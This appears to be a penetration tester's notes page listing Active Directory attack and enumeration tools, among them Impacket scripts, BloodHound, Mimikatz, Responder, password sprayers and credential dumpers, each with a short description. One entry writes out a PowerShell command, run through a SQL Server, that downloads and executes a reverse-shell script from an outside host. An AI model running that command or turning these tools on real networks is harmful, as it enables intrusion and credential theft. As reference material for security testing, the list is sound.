‣ toolkit
Different precompiled .net tools
‣
https://github.com/jakobfriedl/precompiled-binaries/tree/main
‣
| Tool | Description |
|---|---|
| PowerView/SharpView | A PowerShell tool and a .NET port of the same used to gain situational awareness in AD. These tools can be used as replacements for various Windows net* commands and more. PowerView and SharpView can help us gather much of the data that BloodHound does, but it requires more work to make meaningful relationships among all of the data points. These tools are great for checking what additional access we may have with a new set of credentials, targeting specific users or computers, or finding some "quick wins" such as users that can be attacked via Kerberoasting or ASREPRoasting. |
| ‣ | Python rewriting of PowerSploit's PowerView |
| ‣ | PowerView.py is an alternative for the awesome original PowerView.ps1 script. |
| BloodHound | Used to visually map out AD relationships and help plan attack paths that may otherwise go unnoticed. Uses the SharpHound PowerShell or C# ingestor to gather data to later be imported into the BloodHound JavaScript (Electron) application with a Neo4j database for graphical analysis of the AD environment. |
| SharpHound | The C# data collector to gather information from Active Directory about varying AD objects such as users, groups, computers, ACLs, GPOs, user and computer attributes, user sessions, and more. The tool produces JSON files which can then be ingested into the BloodHound GUI tool for analysis. |
| BloodHound.py | A Python-based BloodHound ingestor based on the Impacket toolkit. It supports most BloodHound collection methods and can be run from a non-domain joined attack box. The output can be ingested into the BloodHound GUI for analysis. |
| Kerbrute | A tool written in Go that uses Kerberos Pre-Authentication to enumerate Active Directory accounts and perform password spraying and brute forcing. |
| Impacket toolkit | A collection of tools written in Python for interacting with network protocols. The suite of tools contains various scripts for enumerating and attacking Active Directory. |
| Responder | Responder is a purpose built tool to poison LLMNR, NBT-NS and MDNS, with many different functions. |
| Inveigh.ps1 | Similar to Responder, a PowerShell tool for performing various network spoofing and poisoning attacks. |
| C# Inveigh (InveighZero) | The C# version of Inveigh with with a semi-interactive console for interacting with captured data such as username and password hashes. |
| rpcclient | A part of the Samba suite on Linux distributions that can be used to perform a variety of Active Directory enumeration tasks via the remote RPC service. |
| CrackMapExec (CME) | CME is an enumeration, attack, and post-exploitation toolkit which can help us greatly in enumeration and performing attacks with the data we gather. CME attempts to "live off the land" and abuse built-in AD features and protocols such as SMB, WMI, WinRM, and MSSQL. |
| NetExec | |
| Rubeus | Rubeus is a C# tool built for Kerberos Abuse. |
| GetUserSPNs.py | Another Impacket module geared towards finding Service Principal names tied to normal users. |
| Hashcat | A great hashcracking and password recovery tool. |
| enum4linux | A tool for enumerating information from Windows and Samba systems. |
| enum4linux-ng | A rework of the original Enum4linux tool that works a bit differently. |
| ldapsearch | Built in interface for interacting with the LDAP protocol. |
https://malicious.link/posts/2022/ldapsearch-reference/ |
| windapsearch | A Python script used to enumerate AD users, groups, and computers using LDAP queries. Useful for automating custom LDAP queries. |
| DomainPasswordSpray.ps1 | DomainPasswordSpray is a tool written in PowerShell to perform a password spray attack against users of a domain. |
| ‣ | password spraying attack against all users of a domain using LDAP |
| LAPSToolkit | The toolkit includes functions written in PowerShell that leverage PowerView to audit and attack Active Directory environments that have deployed Microsoft's Local Administrator Password Solution (LAPS). |
| ‣ | Dumping LAPS from Python |
| ‣ | Retrieve LAPS password from LDAP |
| smbmap | SMB share enumeration across a domain. |
| psexec.py | Part of the Impacket toolset, it provides us with psexec like functionality in the form of a semi-interactive shell. |
| wmiexec.py | Part of Impacket toolset, it provides the capability of command execution over WMI. |
| Snaffler | Useful for finding information (such as credentials) in Active Directory on computers with accessible file shares. |
| smbserver.py | Simple SMB server execution for interaction with Windows hosts. Easy way to transfer files within a network. |
| setspn.exe | Reads, modifies, and deletes the Service Principal Names (SPN) directory property for an Active Directory service account. |
| Mimikatz | Performs many functions. Noteably, pass-the-hash attacks, extracting plaintext passwords, and kerberos ticket extraction from memory on host. |
| secretsdump.py | Remotely dump SAM and LSA secrets from a host. |
| evil-winrm | Provides us with an interactive shell on host over the WinRM protocol. |
| ‣ | This tool is used for SQL Server discovery, configuration auditing,
privilege escalation, and post-exploitation.
support SQL Server discovery, weak configuration auditing, privilege escalation on scale, and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However, PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server. |
| mssqlclient.py | Part of Impacket toolset, it provides the ability to interact with MSSQL databases. |
| SQLRecon | Used to enumerate MSSQL servers within a network. |
| mssql_shell | Taking shell directly if the user you have didn’t work try the default usre which is sa |
| mssqlproxy | git clone xxxx -b python3 |
| ‣ | interact and pwn MSSQL servers |
| Invoke-SQLOSCmd | to trigger rev shell
Invoke-SQLOCmd -Verbose -Command "powershell iex(New-Object Net.WebClient).DownloadString(‘http://[REDACTED]/Invoke-PowerShe llTcp.ps1’ -Instance devsrv .garrison.castle.local |
| noPac.py | Exploit combo using CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user. |
| rpcdump.py | Part of the Impacket toolset, RPC endpoint mapper. |
| CVE-2021-1675.py | Printnightmare PoC in python. |
| ntlmrelayx.py | Part of the Impacket toolset, it performs SMB relay attacks. |
| NtlmThief ‣ | Extracting NetNTLM without touching lsass.exe This is a C++ implementation of the Internal Monologue attack. It allows to get NetNTLM hashes of users using SSPI. |
| PetitPotam.py | PoC tool for CVE-2021-36942 to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions. |
| gettgtpkinit.py | Tool for manipulating certificates and TGTs. |
| getnthash.py | This tool will use an existing TGT to request a PAC for the current user using U2U. |
| adidnsdump | A tool for enumeration and dumping of DNS records from a domain. Similar to performing a DNS Zone transfer. |
| gpp-decrypt | Extracts usernames and passwords from Group Policy preferences. |
| GetNPUsers.py | Attempt to list and get TGTs for those users that have the property 'Do not require Kerberos preauthentication' set. |
| lookupsid.py | SID bruteforcing tool. |
| ticketer.py | A tool for creation and customization of TGT/TGS tickets. |
| raiseChild.py | Part of the Impacket toolset, It is a tool for child to parent domain privilege escalation. |
| Active Directory Explorer | Active Directory Explorer (AD Explorer) is an AD viewer and editor. It can be used to navigate an AD database and view object properties and attributes. It can also be used to save a snapshot of an AD database for off-line analysis. When an AD snapshot is loaded, it can be explored as a live version of the database. It can also be used to compare two AD database snapshots to see changes in objects, attributes, and security permissions. |
| PingCastle | Used for auditing the security level of an AD environment based on a risk assessment and maturity framework (based on CMMI adapted to AD security). |
| Group3r | Group3r is useful for auditing and finding security misconfigurations in AD Group Policy Objects (GPO). |
| ADRecon | A tool used to extract various data from a target AD environment. The data can be output in Microsoft Excel format with summary views and analysis to assist with analysis and paint a picture of the environment's overall security state. |
| SharpGPOAbuse | use a tool such as SharpGPOAbuse to take advantage of this GPO misconfiguration by performing actions such as adding a user that we control to the local admins group on one of the affected hosts, creating an immediate scheduled task on one of the hosts to give us a reverse shell, or configure a malicious computer startup script to provide us with a reverse shell or similar. |
| LaZagne | Tool used for retrieving passwords stored on a local machine from web browsers, chat tools, databases, Git, email, memory dumps, PHP, sysadmin tools, wireless network configurations, internal Windows password storage mechanisms, and more |
| SessionGopher | SessionGopher is a PowerShell tool that finds and decrypts saved session information for remote access tools. It extracts PuTTY, WinSCP, SuperPuTTY, FileZilla, and RDP saved session information |
| ‣ | LSASS |
| ‣ | the usage of cloned handles to Lsass in order to create an obfuscated memory dump of the same. |
| ‣ | Exporting username list from the domain or an email by export the global address list |
| ‣ | searching through email in a Microsoft Exchange environment for specific terms (passwords, insider intel, network architecture information, etc.). It can be used as a non-administrative user to search their own email or by an Exchange administrator to search the mailboxes of every user in a domain. |
| MailSniper | A tool for searching through email inboxes in a Microsoft Exchange environment for specific keywords/terms that may be used to enumerate sensitive data (such as credentials) which could be used for lateral movement and privilege escalation. It can search a user's individual mailbox or by a user with Exchange Administrator privileges
to enumerate all mailboxes in a domain. It can also be used for password spraying, enumerating domain users/domains, checking mailbox permissions, and gathering the Global Address List (GAL) from Outlook Web Access (OWA) and Exchange Web Services (EWS). |
| ‣ spray | A Password Spraying tool for Active Directory. SMB, OWA, Lync, CISCO Web VPN, OpenVPN Web Portal |
| ‣ ruler | interact with Exchange servers remotely, through either the MAPI/HTTP or RPC/HTTP protocol. The main aim is abuse the client-side Outlook features and gain a shell remotely.
• Password Spray
• Enumerate valid users
• Create new malicious mail rules
• Dump the Global Address List (GAL) |
| ‣ ntlmscan | scan for NTLM directories
reliable targets are:
• OWA servers
• Skype for Business/Lync servers
• Autodiscover servers (autodiscover.domain.com and lyncdiscover.domain.com)
• ADFS servers
ntlmscan allows us to search against a URL or a host. Additionally, the tool can perform virtual host enumeration. It can be used to target OWA servers, Skype for Business, Autodiscover servers, and ADFS servers. |
| Coercer | automatically coerce a Windows server to authenticate on an arbitrary machine through many methods. |
| pywhisker | allows users to manipulate the msDS-KeyCredentialLink attribute of a target user/computer to obtain full control over that object.
| | ‣ | print "kerberoast" hashes for user accounts that have a SPN set. | | krbrelayx | Kerberos relaying and unconstrained delegation abuse toolkit | | ‣ | ScriptSentry finds misconfigured and dangerous logon scripts. | | ‣ | Monitor creation, deletion and changes to LDAP objects live during your pentest or system administration!
python3 LDAPmonitor/python/pyLDAPmonitor.py -d HTB.LOCAL -u henry.vinson --no-pass -k --dc-ip $IPv6 |
| ADExplorerSnapshot ‣ | ADExplorerSnapshot.py is an AD Explorer snapshot parser. It is made as an ingestor for BloodHound, and also supports full-object dumping to NDJSON. |
| ‣ | DCOMrade is a Powershell script that is able to enumerate the possible vulnerable DCOM applications that might allow for lateral movement, code execution, data exfiltration, etc. |
| pandora ‣ | A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers. They are separated into three categories, Windows 10 desktop applications, browsers, and browser plugins. This may work on other OS, like Linux, but it is not tested yet. In this release (v1.0), the tool supports 14 password managers, with 18 different implementations (e.g., the tool could dump credentials either from the desktop app, or the browser plugin of the same product). Specifically, in most cases, password managers must be up and unlocked for the tool to work.
The tool can be executed in Full, Fast, and Local modes. Full mode dumps and checks all processes of this password manager. Fast mode checks the most common process that usually contains the credentials. Local mode checks the dump file locally. Also, local mode has the "merge" option that can assist in merging multiple dump files into one, before doing the analysis. Additionally, the tool can check if a directory of a password manager exists to assist the user in identifying which password manager can be used in this host. The tool will only need common user's permissions to be able to dump a process from a password manager. Only the 1Password desktop app requires high integrity privileges for the user to be able to dump the process. |
| Seatbelt ‣ | Seatbelt is a C# project that performs a number of security oriented host-survey "safety checks" relevant from both offensive and defensive security perspectives. |
| PowerSharpPack ‣ | AV evasion |
| ‣ | pure-python alternative to Mimikatz's dcshadow technique |
| AccessChk | to know what kind of accesses specific users or groups have to resources including files, directories, Registry keys, global objects and Windows services. |
[
ldapsearch](https://verbose-butter-fad.notion.site/ldapsearch-241572b769db81519474c691cb615560)